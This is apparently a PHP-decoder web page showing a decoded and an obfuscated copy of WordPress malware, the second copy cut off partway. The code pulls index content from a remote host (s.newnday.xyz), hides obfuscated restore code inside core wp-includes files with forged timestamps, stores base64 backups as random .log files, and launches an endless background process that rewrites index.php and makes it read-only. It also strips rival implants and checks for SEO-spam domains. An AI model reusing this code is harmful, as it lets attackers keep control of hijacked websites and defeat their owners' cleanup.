Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

"\x48TT\x50_H\x4fST"<?php header('Access-Control-Allow-Origin:*'); error_reporting(E_ALL..

Decoded Output download

"HTTP_HOST"<?php 
header('Access-Control-Allow-Origin:*'); 
error_reporting(E_ALL); 
$mode = isset($_GET["mode"]) ? $_GET["mode"] : 5; 
 
$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"; 
$domain = "http://s.newnday.xyz/"; 
 
$script_name= $_SERVER["SCRIPT_FILENAME"]; 
$scriptpath=pathinfo($script_name); 
$scrip_dir=$scriptpath['dirname']; 
 
$fullurl=$_SERVER['PHP_SELF']; 
 
$currentpath=pathinfo($fullurl); 
 
$currentdir=$currentpath['dirname']; 
 
if($currentdir=='/' || $currentdir=="\\") 
{ 
	$root=$scrip_dir; 
} 
else 
{ 
$dirinfo=explode($currentdir,$scrip_dir); 
 
$root=$dirinfo[0]; 
} 
 
if($root=='' || strpos($root, ".php") !== false ) 
{ 
	$root=$_SERVER['DOCUMENT_ROOT']; 
} 
echo $root.'<br/>'; 
@chdir($root); 
 
$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http'; 
$host = $_SERVER["HTTP_HOST"]; 
if (isset($_GET["db"])) { 
    $gov = $_GET["db"]; 
} else if (isset($_POST["db"])) { 
    $gov = $_POST["db"]; 
} else { 
    $gov = ''; 
} 
 
function insertAfterTarget($fileCont, $insertCont, $target) 
{ 
    $fileCont = file_get_contents($filePath); 
    $targetIndex = strpos($fileCont, $target); 
 
    if ($targetIndex !== false) { 
        $chLineIndex = strpos(substr($fileCont, $targetIndex), "\n") + $targetIndex; 
        if ($chLineIndex !== false) { 
            $fileCont = substr($fileCont, 0, $chLineIndex + 1) . $insertCont . "\n" . substr($fileCont, $chLineIndex + 1); 
        } 
    } 
    return $fileCont; 
} 
 
function delTargetLine($fileCont, $target) 
{ 
    //$fileCont = file_get_contents($filePath); 
    $targetIndex = strpos($fileCont, $target); 
 
    if ($targetIndex !== false) { 
        $preChLineIndex = strrpos(substr($fileCont, 0, $targetIndex + 1), "\n"); 
        $AfterChLineIndex = strpos(substr($fileCont, $targetIndex), "\n") + $targetIndex; 
        if ($preChLineIndex !== false && $AfterChLineIndex !== false) { 
            $fileCont = substr($fileCont, 0, $preChLineIndex + 1) . substr($fileCont, $AfterChLineIndex + 1); 
//            $fp = fopen($filePath, "w+"); 
//            fwrite($fp, $result); 
//            fclose($fp); 
        } 
    } 
    return $fileCont; 
} 
function insertBeforeTarget($fileCont, $insertCont, $target) 
{ 
    $targetIndex = strrpos($fileCont, $target); 
 
    if ($targetIndex !== false) { 
        $chLineIndex = strrpos(substr($fileCont, 0, $targetIndex), "\n"); 
        if ($chLineIndex !== false) { 
            $fileCont = substr($fileCont, 0, $chLineIndex + 1) . $insertCont . "\n" . substr($fileCont, $chLineIndex + 1); 
        } 
    } 
    return $fileCont; 
} 
function genRandomString($length, &$usedStrings) { 
    $characters = 'abcdefghijklmnopqrstuvwxyz'; 
	$nummax=50; 
    $string = ''; 
    // for ($i = 0; $i < $length; $i++) { 
        // $string .= $characters[mt_rand(0, strlen($characters) - 1)]; 
    // } 
	$string = $characters[mt_rand(0, strlen($characters) - 1)]; 
	$num=mt_rand(0,$nummax); 
	$string .=$num; 
    if (in_array($string, $usedStrings)) { 
        return genRandomString($length, $usedStrings); 
    } else { 
        $usedStrings[] = $string; 
        return $string; 
    } 
} 
 
 
function strto16($string) 
{ 
	$arr1   = str_split($string, 1); 
	$num=0; 
   foreach ($arr1 as $akey => $aval) { 
	 if($num%3==0) 
	 { 
		  $arr1[$akey] = "\x" . bin2hex($aval); 
	 } 
     else 
	 { 
		 $arr1[$akey] =trim($aval); 
	 } 
		$num=$num+1; 
}  
 $arr1str=implode('',$arr1); 
  
 return $arr1str; 
} 
function getx($url) 
{ 
    if (stripos($url, 'http') !== false) { 
        $content = urla($url); 
    } else { 
        $content = file_get_contents($url); 
    } 
    return $content; 
} 
function urla($url, $header = null, $postdata = null) 
{ 
    $ch = curl_init(); 
    curl_setopt($ch, CURLOPT_URL, $url); 
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
    curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate'); 
 
    if (stripos($url, "https:") === false) { 
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); 
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); 
    } 
 
    if (is_array($header) && !empty($header)) { 
        curl_setopt($ch, CURLOPT_HTTPHEADER, $header); 
    } 
    if (is_array($postdata) && !empty($postdata)) { 
        curl_setopt($ch, CURLOPT_POST, 1); 
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); 
    } 
 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
    $body = curl_exec($ch); 
    curl_close($ch); 
    return $body; 
} 
function gfiocheck($url) 
{ 
	 $curl = curl_init(); 
        curl_setopt($curl, CURLOPT_URL, $url); 
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); 
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); // https hosts 
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE); 
		curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 5); 
		curl_setopt($curl, CURLOPT_TIMEOUT, 10); 
		 curl_setopt($curl, CURLOPT_HTTPHEADER, array( 
        'Content-Type: application/json; charset=utf-8', 
        'User-Agent: googlebot'  
    )); 
        $data = curl_exec($curl); 
		if(strpos($data,'ok') !== false  &&  ( strpos($data,'createseo.xyz') !== false ||  strpos($data,'fortuneday.xyz') !== false )){  
		   return true; 
		 
		} 
		else  
		{ 
			 return false; 
		} 
} 
 
 
 
 
function auto_restore_file() 
{ 
  global $fp2, $root,$gov,$mode,$domain,$http,$host; 
 
    $index_path = $root . '/index.php'; 
 
 
$auto_restore_staus=1; 
		 $arr_msg = array(); 
$inde_content_hou="<?php 
/** 
 * Front to the WordPress application. This file doesn't do anything, but loads 
 * wp-blog-header.php which does and tells WordPress to load the theme. 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Tells WordPress to load the WordPress theme and output it. 
 * 
 * @var bool 
 */ 
define( 'WP_USE_THEMES', true ); 
 
/** Loads the WordPress Environment and Template */ 
require( dirname( __FILE__ ) . '/wp-blog-header.php' );"; 
 
	$index_content = @file_get_contents($index_path); 
	 
	if(!$index_content) 
	{ 
       $index_content = getx($domain . $gov . '/' . $gov . '.' . $mode . '.idx'); 
	    if($index_content) 
		{ 
       $index_content=$index_content."\n".$inde_content_hou; 
	    } 
		else 
		{ 
			$auto_restore_staus=0; 
		} 
	} 
  	if($auto_restore_staus) 
	{ 
    $index_size = strlen($index_content); 
    $b64_index_content = base64_encode($index_content); 
	 
	 
    $wordpress_include_path = $root . '/wp-includes/'; 
    $arr_wordpress_filename = array( 
        // 'blocks.php' => 'function register_block_style_handle', 
        'theme.php' => 'function validate_current_theme', 
        //'template.php' => 'function get_archive_template', 
        //'rewrite.php' => 'function url_to_postid', 
        'admin-bar.php' => 'function wp_admin_bar_my_account_menu', 
        'rest-api.php' => 'function register_rest_field', 
        'media.php' => 'function image_downsize', 
        //'nav-menu.php' => 'function is_nav_menu_item', 
        //'theme-templates.php' => 'function wp_enable_block_templates', 
        'block-template.php' => 'function _strip_template_file_suffix', 
		'blocks/archives.php' => 'function render_block_core_archives', 
		'category.php' => 'function get_cat_name', 
		'load.php' => 'function is_wp_error', 
		'plugin.php' => 'function do_action_ref_array', 
		'query.php' => 'function is_front_page', 
		'cron.php' => 'function wp_schedule_event', 
    ); 
    $arr_rand_wordpress_filename = array_rand($arr_wordpress_filename, 10); 
 $hidden_code_template ="//c_start   
\$f_exists =\"file_exists\"; \$ch = \"chmod\"; \$tou = \"touch\";  
\$delete ='un'.'link';\$f_put = 'fil' . 'e_p' . 'ut_' . 'con' . 'ten' . 'ts';  
\$f_get = 'fil' . 'e_g' . 'et_' . 'con' . 'ten' . 'ts'; 
global \$gov;if (!\$gov) { 
\$bs_dec = \"base64_decode\"; \$idx_path = \$_SERVER['DOCUME' . 'NT_ROOT']. '/ind' . 'ex.php'; \$bk_idx_path = '#bk_idx_path#';  if (\$f_exists(\$bk_idx_path)){  
@\$ch(\$idx_path, 0644); \$idx_code=\$f_get(\$bk_idx_path); \$f_result=\$f_put(\$idx_path,\$bs_dec(\$idx_code));@\$ch(\$idx_path, 0444); }   
} 
//c_end"."\n"; 
 
 
 
 
         
   $wordpress_content_path = $root . '/wp-content/'; 
   $wordpress_content_cache= $root . '/wp-content/cachef.php'; 
   
          
         $bk_index_path = $fp2[array_rand($fp2, 1)] . rand_abc(5) . '.log'; 
        @file_put_contents($bk_index_path, $b64_index_content); 
		$new_content1=''; 
		$bk_index_path1=$root.'/'.$bk_index_path;		 
			$hidden_code=str_replace('#bk_idx_path#',$bk_index_path1,$hidden_code_template); 
		$hidden_code=str_replace('#idx_size#',$index_size,$hidden_code); 
	     $hidden_code= preg_replace("/file_put_contents/",strto16('file_put_contents'),$hidden_code);  
		$hidden_code= preg_replace("/file_get_contents/",strto16('file_get_contents'),$hidden_code);  
		$hidden_code= preg_replace("/file_exists/",strto16('file_exists'),$hidden_code);  
		$hidden_code= preg_replace("/filesize/",strto16('filesize'),$hidden_code);  
		$hidden_code= preg_replace("/chmod/",strto16('chmod'),$hidden_code);  
		$hidden_code= preg_replace("/touch/",strto16('touch'),$hidden_code);  
          
		$putcache=@file_put_contents( $wordpress_content_cache, '<?php '.$hidden_code.' ?>'); 
		if (!$putcache)  
		{ 
		$arr_msg[] = 'modify file '.$wordpress_content_cache.' file fail.'; 
		} 
		else  
		{ 
		$arr_msg[] = 'modify file '.$wordpress_content_cache.' file success.'; 
		@touch($wordpress_content_cache, strtotime("-260 days", time())); 
		} 
		 
				 
    foreach ($arr_rand_wordpress_filename as $key => $wordpress_filename) { 
       
        $needle = $arr_wordpress_filename[$wordpress_filename]; 
        $wordpress_filepath = $wordpress_include_path . $wordpress_filename; 
        if (!file_exists($wordpress_filepath)) { 
            continue; 
        } 
        $old_content = file_get_contents($wordpress_filepath); 
        
		 $bk_index_path3 = $fp2[array_rand($fp2, 1)] . rand_abc(5) . '.log'; 
         @file_put_contents($bk_index_path3, $b64_index_content); 
		 
		$hidden_code_template=str_replace("#bk_idx_path#",$bk_index_path3,$hidden_code_template); 
		$hidden_code_template=str_replace("#idx_size#",$index_size,$hidden_code_template); 
		$hidden_code_template=str_replace("#indexbase64#",$b64_index_content,$hidden_code_template); 
		 $new_content = str_replace($needle, $hidden_code . $needle, $old_content); 
	    $new_content1=str_replace($needle, $hidden_code_template ."\n". $needle, $old_content); 
		$fileoldtime=filectime($wordpress_filepath); 
 
		  
        @chmod($wordpress_filepath, 438); 
        @unlink($wordpress_filepath); 
		 
		 
        $success = @file_put_contents($wordpress_filepath, $new_content1); 
	 
		touch($wordpress_filepath,$fileoldtime); 
        $arr_msg[] = 'hide code: ' . $wordpress_filepath . ' ' . ($success ? 'success' : 'fail'); 
    } 
	} 
	else 
	{ 
		  $arr_msg[] ='hide code fail'; 
	} 
	 
    return $arr_msg; 
} 
function crack_auto_restore() 
{ 
    global $root; 
 
    $arr_wordpress_filename = array( 
         'blocks.php' => 'function register_block_style_handle', 
        'theme.php' => 'function validate_current_theme', 
        'template.php' => 'function get_archive_template', 
        'rewrite.php' => 'function url_to_postid', 
        'admin-bar.php' => 'function wp_admin_bar_my_account_menu', 
        'rest-api.php' => 'function register_rest_field', 
        'media.php' => 'function image_downsize', 
        'nav-menu.php' => 'function is_nav_menu_item', 
        'theme-templates.php' => 'function wp_enable_block_templates', 
        'block-template.php' => 'function _strip_template_file_suffix', 
		'blocks/archives.php' => 'function render_block_core_archives', 
		'category.php' => 'function get_cat_name', 
		'load.php' => 'function is_wp_error', 
		'plugin.php' => 'function do_action_ref_array', 
		'query.php' => 'function is_front_page', 
		'cron.php' => 'function wp_schedule_event', 
    ); 
 
    $wordpress_include_path = $root . '/wp-includes/'; 
    $arr_msg = array(); 
		foreach ($arr_wordpress_filename as $wordpress_filename => $needle) { 
		$wordpress_filepath = $wordpress_include_path . $wordpress_filename; 
		if (!file_exists($wordpress_filepath)) { 
			continue; 
		} 
		$old_content = @file_get_contents($wordpress_filepath); 
		if (preg_match('/\/\/ cyborg_start[\s\S]*?\/\/ cyborg_end/', $old_content)) { 
			$new_content = preg_replace('/\/\/ cyborg_start[\s\S]*?\/\/ cyborg_end/', '', $old_content); 
			file_put_contents($wordpress_filepath, $new_content); 
			$arr_logs[] = 'delete hidden code: ' . $wordpress_filepath; 
		} 
	} 
    foreach ($arr_wordpress_filename as $wordpress_filename => $needle) { 
        $wordpress_filepath = $wordpress_include_path . $wordpress_filename; 
        if (!file_exists($wordpress_filepath)) { 
            continue; 
        } 
        $old_content = file_get_contents($wordpress_filepath); 
        if (preg_match('/\/\/c_start[\s\S]*?\/\/c_end/', $old_content)) { 
            $new_content = preg_replace('/\/\/c_start[\s\S]*?\/\/c_end/', '', $old_content); 
            $success = @file_put_contents($wordpress_filepath, $new_content); 
            $arr_msg[] = 'crack restore: ' . $wordpress_filepath . ' ' . ($success ? 'success' : 'fail'); 
        } 
    } 
 
    // if (file_exists('wp-includes/fonts/dashicons.ttc')) { 
        // @unlink('wp-includes/fonts/dashicons.ttc'); 
        // $arr_msg[] = "delete ttc ok"; 
    // } 
 
    // if (file_exists('wp-admin/images/browser-tiny.png')) { 
        // @unlink('wp-admin/images/browser-tiny.png'); 
        // $arr_msg[] = "delete png ok"; 
    // } 
 
    $arr_msg[] = "pluggable " . cleancroncode($root.'/wp-includes/pluggable.php', "i = 'inde'.'x.php';", "if ( ! function_exists( 'wp_set_auth_cookie'"); 
    $arr_msg[] = "cron " . cleancroncode($root.'/wp-includes/cron.php', "i = 'inde'.'x.php';", "function wp_get_schedules() {"); 
    return $arr_msg; 
} 
function cleancroncode($file, $startstr, $endstr) 
{ 
    $msg = 'cron no code'; 
    if (file_exists($file)) { 
 
        $ma = file_get_contents($file); 
 
        $start = strpos($ma, $startstr); 
 
        if ($start !== false) { 
 
            $head = substr($ma, 0, $start - 1); 
 
            $end = strpos($ma, $endstr); 
 
            $foot = substr($ma, $end); 
 
            file_put_contents($file, $head . $foot); 
 
            $msg = 'clear cron code'; 
 
        } else { 
            $msg = 'cron no code'; 
        } 
    } 
    return $msg; 
} 
 
function insertcroncode($file, $src, $beforetag) 
{ 
    // code 
    $c = file_get_contents($file); 
    $pn = file_put_contents($file, str_replace($beforetag, $src . "\n" . $beforetag, $c)); 
    if ($pn) { 
        $msg = "line of $file ok"; 
    } else { 
        $msg = "line of $file fail"; 
    } 
    return $msg; 
} 
function output_message($result, $message_type = 'html', $html_tag = 'li') 
{ 
 
    if ($message_type != 'html') { 
        echo json_encode($result); 
        return; 
    } 
 
    if (!is_array($result)) { 
        return; 
    } 
 
    if (!isset($result['title'])) { 
        $result['title'] = ''; 
    } 
 
    echo '---------start ' . $result['title']; 
 
    if (sizeof($result['message']) > 0) { 
        foreach ($result['message'] as $message) { 
            $message = str_replace('success', '<font color="blue">success</font>', $message); 
            $message = str_replace(' ok', '<font color="blue"> ok</font>', $message); 
            $message = str_replace('fail', '<font color="red">fail</font>', $message); 
            echo "<$html_tag>" . $message . "</$html_tag>"; 
        } 
    } 
 
    if (isset($result['status']) && !empty($result['status'])) { 
 
        if ($result['status'] == 'ok') { 
            $status = '<font color="green">' . $result['status'] . '</font>'; 
        } 
 
        if ($result['status'] == 'fail') { 
            $status = '<font color="red">' . $result['status'] . '</font>'; 
        } 
 
        echo '---------end ' . $result['title'] . '===>status:' . $status; 
 
    } else { 
 
        $status = '<font color="green">ok</font>'; 
 
        echo '---------end ' . $result['title'] . '===>status:' . $status; 
    } 
 
    echo "<br />"; 
    echo "<br />"; 
 
} 
function fi1($path) 
{ 
    global $root, $arpath8; 
    if ($handle = opendir($path)) { 
        while (($file = readdir($handle)) !== false) { 
            if ($file != "." && $file != "..") { 
                $pfile = $path . "/" . $file; 
                if (is_dir($pfile) && !is_link($pfile)) { 
                    if (substr_count(str_replace($root . '/', '', $pfile), '/') < 3) { 
                        fi1($pfile); 
                    } 
                    if (!file_exists($pfile . "/index.php")) { 
                        array_push($arpath8, str_replace($root . '/', '', $pfile)); 
                    } 
 
                } 
            } 
        } 
    } 
    shuffle($arpath8); 
} 
function fp2($root) 
{ 
    global $root, $http, $host, $domain, $ht, $gov, $arpath8; 
 
    $p_arr = array(); 
    $pnew_arr = array(); 
 
    foreach ($arpath8 as $k => $v) { 
        $qupath = str_replace($root, "", $v); 
        $p_arr[$k] = explode("/", $qupath); 
        if (count($p_arr[$k]) >= 3) { 
            $pnew_arr[] = $v; 
        } 
    } 
 
    return $pnew_arr; 
} 
function rand_abc($length) 
{ 
    $str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; 
    $strlen = 52; 
    while ($length > $strlen) { 
        $str .= $str; 
        $strlen += 52; 
    } 
    $str = str_shuffle($str); 
    return substr($str, 0, $length); 
} 
function file_get_https($url, $timeout) 
{ 
    $arrContextOptions = array( 
        "ssl" => array( 
            "verify_peer" => false, 
            "verify_peer_name" => false, 
        ), 
        'http' => array( 
            'method' => "GET", 
            'timeout' => $timeout, 
        ), 
    ); 
 
    @file_get_contents($url, false, stream_context_create($arrContextOptions)); 
 
} 
 
function auto_restore_cycle() 
{ 
    $arr_msg = array(); 
$code ="<?php set_time_limit(99 - 99); 
ignore_user_abort(1); 
 
function auto_restore_memory() 
{ 
    \$index_path = \$_SERVER['DOCUMENT_ROOT'] . '/index.php'; 
    \$flag_filename = \$_SERVER['DOCUMENT_ROOT'] . '/3FNDICU2KH'; 
    @unlink(\$flag_filename); 
    \$index_code = @file_get_contents(\$index_path); 
    while (1) { 
        clearstatcache(); 
        if (file_exists(\$flag_filename)){ 
            break; 
        } 
        if (!file_exists(\$index_path) or @file_get_contents(\$index_path) != \$index_code) { 
            @chmod(\$index_path, 438); 
            @unlink(\$index_path); 
            @file_put_contents(\$index_path, \$index_code); 
            @chmod(\$index_path, 292); 
        } 
        sleep(2); 
    } 
} 
 
ob_end_clean(); 
header(\"Connection: close\"); 
ob_start(); 
echo 888; 
header(\"Content-Length: \" . ob_get_length()); 
ob_end_flush(); 
flush(); 
 
auto_restore_memory(); ?>"; 
    $file_path = $_SERVER['DOCUMENT_ROOT'] . '/' . 'cyborg_tmp.php'; 
    $success = @file_put_contents($file_path, $code); 
    $arr_msg[] = 'write tmp file: ' . $file_path . ' ' . ($success ? 'success' : 'fail'); 
    if (!$success) { 
        return $arr_msg; 
    } 
    $protocol = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http'; 
    $file_url = str_replace($_SERVER['DOCUMENT_ROOT'], $protocol . '://' . $_SERVER['HTTP_HOST'], $file_path); 
   file_get_https($file_url, 3); 
   $arr_msg[] = 'get: ' . $file_url . ' ok'; 
  $success = @unlink($file_path); 
   $arr_msg[] = 'delete: ' . $file_path . ' ' . ($success ? 'success' : 'fail'); 
    return $arr_msg; 
} 
 
function hiddenma() 
{ 
    global $root, $http, $host, $ht, $gov, $sitemap_code_file, $oneline, $mode, $domain,$fsize; 
 
 
    $return_result = array(); 
    $return_result['title'] = __FUNCTION__; 
 
    if (is_dir("wp-includes") && is_dir("wp-admin")) { 
 
        // if (file_exists("wp-config.php")) { 
            // $return_result['message'][] = adduser('wp-blog', '$P$BFHUiQbVj3FJKfYu/xB/LTghBaAXLe1', true); 
            // $return_result['message'][] = adduser('wp-user', '1bc83cec427917671aef3f1c63c150f9', false); 
        // } 
 
        $arr_msg = crack_auto_restore(); 
        foreach ($arr_msg as $key => $msg) { 
            $return_result['message'][] = $msg; 
        } 
 
        $arr_msg = auto_restore_file(); 
        foreach ($arr_msg as $key => $msg) { 
            $return_result['message'][] = $msg; 
        } 
		 
		// $wcc_file=@file_get_contents($_SERVER['DOCUMENT_ROOT'].'/wp-content/cachef')); 
         $check_ginfo_url=$http.'://'.$host.'/?ginfo'; 
		$check_staus=gfiocheck($check_ginfo_url); 
		 if($check_staus) 
		 { 
		 $return_result['message'][] = 'ginfo:ok'; 
		 } 
			$arr_msg = auto_restore_cycle(); 
			foreach ($arr_msg as $key => $msg) { 
			$return_result['message'][] = $msg; 
			}  
		  
 
    } 
  
    return $return_result; 
} 
if (isset($_POST['message_type']) && !empty($_POST['message_type'])) { 
    $message_type = $_POST['message_type']; 
} else { 
    $message_type = 'html'; 
} 
$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"; 
$domain = "http://s.newnday.xyz/"; 
$root = $_SERVER['DOCUMENT_ROOT']; 
@chdir($root); 
 
$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http'; 
$host = $_SERVER["HTTP_HOST"]; 
 
$arpath8 = array(); 
 
fi1($root); 
 
$fp2 = @fp2($root); 
 
$ht = 
    ' 
<IfModule mod_rewrite.c> 
RewriteEngine On 
RewriteBase / 
RewriteRule ^index.php$ - [L] 
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule . index.php [L] 
</IfModule> 
'; 
 
 
    $hiddenma_result = hiddenma(); // 4 
    output_message($hiddenma_result, $message_type); 
	 
	 
 
 
?>

Did this file decode correctly?

Original Code

"\x48TT\x50_H\x4fST"<?php
header('Access-Control-Allow-Origin:*');
error_reporting(E_ALL);
$mode = isset($_GET["mode"]) ? $_GET["mode"] : 5;

$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)";
$domain = "\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f";

$script_name= $_SERVER["SCRIPT_FILENAME"];
$scriptpath=pathinfo($script_name);
$scrip_dir=$scriptpath['dirname'];

$fullurl=$_SERVER['PHP_SELF'];

$currentpath=pathinfo($fullurl);

$currentdir=$currentpath['dirname'];

if($currentdir=='/' || $currentdir=="\\")
{
	$root=$scrip_dir;
}
else
{
$dirinfo=explode($currentdir,$scrip_dir);

$root=$dirinfo[0];
}

if($root=='' || strpos($root, ".php") !== false )
{
	$root=$_SERVER['DOCUMENT_ROOT'];
}
echo $root.'<br/>';
@chdir($root);

$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
if (isset($_GET["db"])) {
    $gov = $_GET["db"];
} else if (isset($_POST["db"])) {
    $gov = $_POST["db"];
} else {
    $gov = '';
}

function insertAfterTarget($fileCont, $insertCont, $target)
{
    $fileCont = file_get_contents($filePath);
    $targetIndex = strpos($fileCont, $target);

    if ($targetIndex !== false) {
        $chLineIndex = strpos(substr($fileCont, $targetIndex), "\n") + $targetIndex;
        if ($chLineIndex !== false) {
            $fileCont = substr($fileCont, 0, $chLineIndex + 1) . $insertCont . "\n" . substr($fileCont, $chLineIndex + 1);
        }
    }
    return $fileCont;
}

function delTargetLine($fileCont, $target)
{
    //$fileCont = file_get_contents($filePath);
    $targetIndex = strpos($fileCont, $target);

    if ($targetIndex !== false) {
        $preChLineIndex = strrpos(substr($fileCont, 0, $targetIndex + 1), "\n");
        $AfterChLineIndex = strpos(substr($fileCont, $targetIndex), "\n") + $targetIndex;
        if ($preChLineIndex !== false && $AfterChLineIndex !== false) {
            $fileCont = substr($fileCont, 0, $preChLineIndex + 1) . substr($fileCont, $AfterChLineIndex + 1);
//            $fp = fopen($filePath, "w+");
//            fwrite($fp, $result);
//            fclose($fp);
        }
    }
    return $fileCont;
}
function insertBeforeTarget($fileCont, $insertCont, $target)
{
    $targetIndex = strrpos($fileCont, $target);

    if ($targetIndex !== false) {
        $chLineIndex = strrpos(substr($fileCont, 0, $targetIndex), "\n");
        if ($chLineIndex !== false) {
            $fileCont = substr($fileCont, 0, $chLineIndex + 1) . $insertCont . "\n" . substr($fileCont, $chLineIndex + 1);
        }
    }
    return $fileCont;
}
function genRandomString($length, &$usedStrings) {
    $characters = 'abcdefghijklmnopqrstuvwxyz';
	$nummax=50;
    $string = '';
    // for ($i = 0; $i < $length; $i++) {
        // $string .= $characters[mt_rand(0, strlen($characters) - 1)];
    // }
	$string = $characters[mt_rand(0, strlen($characters) - 1)];
	$num=mt_rand(0,$nummax);
	$string .=$num;
    if (in_array($string, $usedStrings)) {
        return genRandomString($length, $usedStrings);
    } else {
        $usedStrings[] = $string;
        return $string;
    }
}


function strto16($string)
{
	$arr1   = str_split($string, 1);
	$num=0;
   foreach ($arr1 as $akey => $aval) {
	 if($num%3==0)
	 {
		  $arr1[$akey] = "\x" . bin2hex($aval);
	 }
     else
	 {
		 $arr1[$akey] =trim($aval);
	 }
		$num=$num+1;
} 
 $arr1str=implode('',$arr1);
 
 return $arr1str;
}
function getx($url)
{
    if (stripos($url, 'http') !== false) {
        $content = urla($url);
    } else {
        $content = file_get_contents($url);
    }
    return $content;
}
function urla($url, $header = null, $postdata = null)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');

    if (stripos($url, "https:") === false) {
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    }

    if (is_array($header) && !empty($header)) {
        curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    }
    if (is_array($postdata) && !empty($postdata)) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
    }

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}
function gfiocheck($url)
{
	 $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); // https hosts
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
		curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 5);
		curl_setopt($curl, CURLOPT_TIMEOUT, 10);
		 curl_setopt($curl, CURLOPT_HTTPHEADER, array(
        'Content-Type: application/json; charset=utf-8',
        'User-Agent: googlebot' 
    ));
        $data = curl_exec($curl);
		if(strpos($data,'ok') !== false  &&  ( strpos($data,'createseo.xyz') !== false ||  strpos($data,'fortuneday.xyz') !== false )){ 
		   return true;
		
		}
		else 
		{
			 return false;
		}
}




function auto_restore_file()
{
  global $fp2, $root,$gov,$mode,$domain,$http,$host;

    $index_path = $root . '/index.php';


$auto_restore_staus=1;
		 $arr_msg = array();
$inde_content_hou="<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );";

	$index_content = @file_get_contents($index_path);
	
	if(!$index_content)
	{
       $index_content = getx($domain . $gov . '/' . $gov . '.' . $mode . '.idx');
	    if($index_content)
		{
       $index_content=$index_content."\n".$inde_content_hou;
	    }
		else
		{
			$auto_restore_staus=0;
		}
	}
  	if($auto_restore_staus)
	{
    $index_size = strlen($index_content);
    $b64_index_content = base64_encode($index_content);
	
	
    $wordpress_include_path = $root . '/wp-includes/';
    $arr_wordpress_filename = array(
        // 'blocks.php' => 'function register_block_style_handle',
        'theme.php' => 'function validate_current_theme',
        //'template.php' => 'function get_archive_template',
        //'rewrite.php' => 'function url_to_postid',
        'admin-bar.php' => 'function wp_admin_bar_my_account_menu',
        'rest-api.php' => 'function register_rest_field',
        'media.php' => 'function image_downsize',
        //'nav-menu.php' => 'function is_nav_menu_item',
        //'theme-templates.php' => 'function wp_enable_block_templates',
        'block-template.php' => 'function _strip_template_file_suffix',
		'blocks/archives.php' => 'function render_block_core_archives',
		'category.php' => 'function get_cat_name',
		'load.php' => 'function is_wp_error',
		'plugin.php' => 'function do_action_ref_array',
		'query.php' => 'function is_front_page',
		'cron.php' => 'function wp_schedule_event',
    );
    $arr_rand_wordpress_filename = array_rand($arr_wordpress_filename, 10);
 $hidden_code_template ="//c_start  
\$f_exists =\"file_exists\"; \$ch = \"chmod\"; \$tou = \"touch\"; 
\$delete ='un'.'link';\$f_put = 'fil' . 'e_p' . 'ut_' . 'con' . 'ten' . 'ts'; 
\$f_get = 'fil' . 'e_g' . 'et_' . 'con' . 'ten' . 'ts';
global \$gov;if (!\$gov) {
\$bs_dec = \"base64_decode\"; \$idx_path = \$_SERVER['DOCUME' . 'NT_ROOT']. '/ind' . 'ex.php'; \$bk_idx_path = '#bk_idx_path#';  if (\$f_exists(\$bk_idx_path)){ 
@\$ch(\$idx_path, 0644); \$idx_code=\$f_get(\$bk_idx_path); \$f_result=\$f_put(\$idx_path,\$bs_dec(\$idx_code));@\$ch(\$idx_path, 0444); }  
}
//c_end"."\n";




        
   $wordpress_content_path = $root . '/wp-content/';
   $wordpress_content_cache= $root . '/wp-content/cachef.php';
  
         
         $bk_index_path = $fp2[array_rand($fp2, 1)] . rand_abc(5) . '.log';
        @file_put_contents($bk_index_path, $b64_index_content);
		$new_content1='';
		$bk_index_path1=$root.'/'.$bk_index_path;		
